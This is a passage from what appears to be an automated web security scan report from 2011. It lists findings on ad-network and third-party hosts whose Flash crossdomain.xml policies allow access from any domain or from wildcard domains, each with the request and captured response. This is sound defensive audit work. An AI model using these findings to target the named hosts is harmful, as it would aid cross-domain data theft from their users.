Content-Length: 194
Date: Sun, 24 Apr 2011 03:16:36 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.13. http://clk.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.14. http://ctix8.cheaptickets.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ctix8.cheaptickets.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:90b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 12:09:47 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.15. http://data.coremetrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:17 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "342dd0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=805
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.16. http://ec.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 486563
Date: Sun, 24 Apr 2011 12:29:09 GMT
Expires: Mon, 25 Apr 2011 21:19:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.17. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Sun, 24 Apr 2011 12:30:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

6.18. http://exch.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exch.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: exch.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 25 Apr 2011 12:37:02 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 24 Apr 2011 12:37:02 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.19. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 00:37:13 GMT
Expires: Thu, 21 Apr 2011 00:36:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 41556
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.20. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.21. http://img1.wsimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:da7"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:06 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.22. http://img3.wsimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:da7"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:04 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.23. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.24. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19982
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.25. http://roia.biz/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://roia.biz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: roia.biz

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:22:22 GMT
Content-Type: text/x-cross-domain-policy
Content-Length: 175
Last-Modified: Tue, 25 Nov 2008 04:11:55 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" />
</cross-domain-policy>


6.26. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 23 Apr 2011 21:09:03 GMT
Expires: Thu, 21 Apr 2011 21:08:15 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 55682
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.27. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sun, 01 May 2011 11:58:17 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://switch.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Sun, 24 Apr 2011 03:16:37 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.29. http://tracking.keywordmax.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracking.keywordmax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tracking.keywordmax.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 16 Jan 2007 19:43:34 GMT
ETag: "98-4272d93d40580"
Accept-Ranges: bytes
Content-Length: 152
X-Server-Name: kwmweb@dc1kwmweb07
Keep-Alive: timeout=3, max=498
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.keywordmax.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://www.dictof.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dictof.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:09 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Wed, 23 Sep 2009 22:46:44 GMT
ETag: "14f-474467d34fd00"
Accept-Ranges: bytes
Content-Length: 335

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.31. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:20:00 GMT
Expires: Sun, 24 Apr 2011 21:20:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 21200
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.32. http://i35.tinypic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i35.tinypic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i35.tinypic.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:44 GMT
Content-Length: 916
Content-Type: text/xml
ETag: "394-39350380"
Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT
Accept-Ranges: bytes
Server: Apache
X-Cache: MISS from tinypic.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.quantserve.com"/>
<allow-access-from domain="*.tinypic.com" />
<allow-access-from domain="tinypic.com" />
<allow-access-from domain="*.photobucket.com" />
<allow-access-from domain="photobucket.com" />
<allow-access-from domain="*.dancejam.com" />
<allow-access-from domain="dancejam.com" />
<allow-access-from domain="*.fotoflexer.com"/>
<allow-access-from domain="fotoflexer.com"/>
<allow-access-from domain="*.flektor.com"/>
<allow-access-from domain="flektor.com"/>
<allow-access-from domain="*.picnik.com"/>
<allow-access-from domain="picnik.com"/>
<allow-access-from domain="*.glogster.com"/>
<allow-access-from domain="glogster.com"/>
...[SNIP]...

6.33. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 23 Apr 2011 21:09:23 GMT
Expires: Sun, 24 Apr 2011 21:09:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25850
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.34. http://partners.nextadnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: partners.nextadnetwork.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:32 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Last-Modified: Fri, 17 Oct 2008 14:23:20 GMT
ETag: "da-45973b505a600"
Accept-Ranges: bytes
Content-Length: 218
X-Server-Name: www@dc1dtweb74
Keep-Alive: timeout=3, max=898
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.directtrack.com" />
</cro
...[SNIP]...

6.35. http://www.apmebf.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apmebf.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

6.36. http://www.emjcd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emjcd.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
